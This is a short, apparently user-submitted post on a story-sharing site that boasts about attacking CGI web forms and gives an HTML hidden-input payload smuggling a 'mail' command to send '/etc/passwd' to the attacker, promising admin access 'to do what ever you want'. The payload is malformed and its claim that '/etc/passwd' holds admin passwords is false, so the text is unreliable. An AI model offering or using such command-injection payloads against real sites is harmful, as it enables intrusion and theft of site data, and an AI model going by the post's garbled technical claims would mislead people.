One of the biggest security holes presented in the internet are CGI interfaces.(Common Gateway Interfaces).CGI interfaces are things such as forms,message boards, guestbooks, some chatrooms, and on site search engines.These allow the person browsing to have direct access to the server and source programming of the website.CGI vulnerability can be exploited by submitting certain HTML tags,JavaScript, or a script from another applicable language.One can easily acquire unauthorized administrative access to the website.This can be done by submitting the following code.
<INPUT TYPE="hidden" CONTENT="mailto_address" VALUE="address@server;mail you@youremailprovider"></etc/passwd>
This script will email you the admin password list to that website, enabling you to do what ever you want to that website:) How it changed my life:Fun fun fun!!! :) You can join Unsolved Mysteries and post your own mysteries or interesting stories for the world to read and respond to Click hereScroll all the way down to read replies.Show all stories by Author: 16612 ( Click here )
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